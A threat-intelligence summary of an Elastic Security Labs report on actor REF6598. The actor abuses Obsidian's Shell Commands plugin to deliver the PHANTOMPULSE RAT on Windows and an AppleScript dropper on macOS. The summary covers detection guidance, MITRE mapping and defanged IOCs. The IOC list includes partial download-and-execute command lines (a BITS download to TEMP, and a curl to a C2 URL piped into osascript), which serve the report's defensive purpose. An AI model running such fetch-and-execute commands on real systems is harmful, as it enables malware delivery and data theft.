Skip to content
.ca
sign in
6 minhigh

Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT

Threat actor REF6598 is targeting the financial and cryptocurrency sectors using social engineering to trick victims into opening a malicious Obsidian vault. The attack leverages Obsidian's community plugins to execute cross-platform attack chains, culminating in the deployment of the PHANTOMPULSE RAT on Windows and an AppleScript dropper on macOS.

Sens:24hConf:highAnalyzed:2026-04-13reports

Authors: Elastic Security Labs

ActorsREF6598PHANTOMPULSEPHANTOMPULL
PhantomPullPhantomPulseObsidianREF6598Blockchain C2

Source:Elastic Security Labs

IOCs · 4

Key Takeaways

  • Obsidian note-taking app abused as an initial access vector via trojanized community plugins.
  • Cross-platform attack chain targeting Windows and macOS users in the financial and cryptocurrency sectors.
  • Deploys PHANTOMPULSE, a novel AI-assisted Windows RAT with blockchain-based C2 resolution.
  • macOS payload utilizes a multi-stage AppleScript dropper with a Telegram dead-drop fallback for C2.
  • A weakness in the blockchain C2 mechanism allows responders to potentially hijack the C2 resolution.

Affected Systems

  • Windows
  • macOS
  • Obsidian

Attack Chain

The attack begins with social engineering, tricking victims into opening a malicious Obsidian vault and enabling community plugins. The 'Shell Commands' plugin executes a PowerShell script on Windows or an AppleScript on macOS. On Windows, this downloads the PHANTOMPULL loader, which reflectively loads the PHANTOMPULSE RAT into memory. PHANTOMPULSE establishes C2 via blockchain transaction data and performs various backdoor functions. On macOS, a LaunchAgent is created for persistence, and an obfuscated AppleScript dropper retrieves the next stage from a C2 domain or a fallback Telegram channel.

Detection Availability

  • YARA Rules: Yes
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: Yes
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Elastic Security

Elastic provides KQL queries to detect anomalous child processes spawned by Obsidian and YARA rules to identify the PHANTOMPULL loader and PHANTOMPULSE RAT.

Detection Engineering Assessment

EDR Visibility: High — EDR can easily detect anomalous child processes (PowerShell, bash, osascript) spawning from the Obsidian application, as well as reflective loading and module stomping behaviors. Network Visibility: Medium — C2 traffic uses standard HTTPS and WinHTTP, blending in with normal traffic. Blockchain API queries (Blockscout) and Telegram API calls may be visible but are often legitimate. Detection Difficulty: Moderate — While the initial execution from Obsidian is highly anomalous and easy to spot, the subsequent in-memory reflective loading and blockchain-based C2 resolution make tracking the payload and infrastructure more difficult.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Sysmon Event ID 11)
  • Network Connections (Sysmon Event ID 3)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for shell interpreters (powershell.exe, cmd.exe, bash, sh, zsh) spawned as child processes of Obsidian.exe or Obsidian.Process CreationExecutionLow
Identify network connections to Blockscout API endpoints (eth.blockscout.com, base.blockscout.com, optimism.blockscout.com) originating from unbacked memory regions or suspicious processes.Network Connections, Process MemoryCommand and ControlMedium
Detect the creation of LaunchAgent plist files containing randomized names in the ~/Library/LaunchAgents/ directory on macOS.File CreationPersistenceLow

Control Gaps

  • Application-level plugin policies for Obsidian are often non-existent or unenforced.
  • Traditional AV may miss the malicious JSON configuration files used for initial execution.

Key Behavioral Indicators

  • Obsidian spawning powershell.exe or osascript
  • Use of BitsTransfer to download executables to the TEMP directory
  • Timer queue callbacks used for execution delays (50ms)

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block the identified C2 IPs and domains.
  • Search endpoints for the presence of the malicious Obsidian plugins (Shell Commands, Hider) and associated data.json configurations.
  • Isolate any hosts exhibiting anomalous child processes spawned by Obsidian.

Infrastructure Hardening

  • Implement application control to restrict the execution of unauthorized scripts or binaries from user directories.
  • Enforce network segmentation to limit lateral movement if a host is compromised.

User Protection

  • Deploy EDR solutions configured to monitor for suspicious child process creation from productivity applications.
  • Implement policies to restrict or monitor the installation of community plugins in applications like Obsidian.

Security Awareness

  • Educate users in the financial and cryptocurrency sectors about social engineering tactics on LinkedIn and Telegram.
  • Train users to be cautious when opening shared cloud vaults or enabling third-party plugins in productivity tools.

MITRE ATT&CK Mapping

  • T1566.003 - Phishing: Spearphishing via Service
  • T1204.002 - User Execution: Malicious File
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.002 - Command and Scripting Interpreter: AppleScript
  • T1140 - Deobfuscate/Decode Files or Information
  • T1620 - Reflective Code Loading
  • T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion
  • T1055 - Process Injection
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1547.011 - Boot or Logon Autostart Execution: Plist Modification
  • T1056.001 - Input Capture: Keylogging
  • T1113 - Screen Capture
  • T1082 - System Information Discovery
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass UAC

Additional IOCs

  • Ips:
    • 104[.]21[.]79[[.]]142 - Cloudflare IP for PhantomPulse C2 panel
    • 172[.]67[.]146[[.]]15 - Cloudflare IP for PhantomPulse C2 panel
    • 188[.]114[.]97[[.]]1 - Historical IP for PhantomPulse C2 panel
    • 188[.]114[.]96[[.]]1 - Historical IP for PhantomPulse C2 panel
  • Domains:
    • thoroughly-publisher-troy-clara[[.]]trycloudflare[[.]]com - Prior PhantomPulse C2 (Cloudflare Tunnel)
    • eth[.]blockscout[[.]]com - Ethereum L1 Blockscout API used for C2 resolution
    • base[.]blockscout[[.]]com - Base L2 Blockscout API used for C2 resolution
    • optimism[.]blockscout[[.]]com - Optimism L2 Blockscout API used for C2 resolution
  • Urls:
    • hxxp://195[.]3[.]222[[.]]251/script1[.]ps1 - URL for Stage 2 PowerShell script
    • hxxp://195[.]3[.]222[[.]]251/syncobs[.]exe?q=%23OBSIDIAN - URL for PHANTOMPULL loader download
    • hxxp://195[.]3[.]222[[.]]251/stuk-phase - C2 endpoint for loader status reporting
    • t[.]me/ax03bot - macOS dropper Telegram fallback C2
  • File Paths:
    • C:\Users\user\Documents\<redacted_vault_name>\.obsidian\plugins\obsidian-shellcommands\data.json - Malicious Obsidian Shell Commands configuration file
    • env:TEMP\tt.ps1 - Temporary path for downloaded PowerShell script
    • env:TEMP\syncobs.exe - Temporary path for PHANTOMPULL loader
    • ~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist - macOS LaunchAgent persistence file
  • Command Lines:
    • Purpose: Download and execute second-stage PowerShell script | Tools: powershell.exe, iwr | Stage: Execution
    • Purpose: Download next-stage binary using BITS | Tools: Start-BitsTransfer | Stage: Payload Delivery | Start-BitsTransfer -Source ... -Destination "$env:TEMP\syncobs.exe"
    • Purpose: Execute macOS payload via osascript | Tools: osascript, bash | Stage: Execution | /bin/bash -c ... | osascript
    • Purpose: Download macOS second-stage payload | Tools: curl, osascript | Stage: Payload Delivery | curl -s --connect-timeout 5 ... -X POST <C2_URL> ... | osascript
  • Other:
    • hVNBUORXNiFLhYYh - Mutex created by PHANTOMPULL loader
    • 0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E - Funding wallet for C2 resolution wallet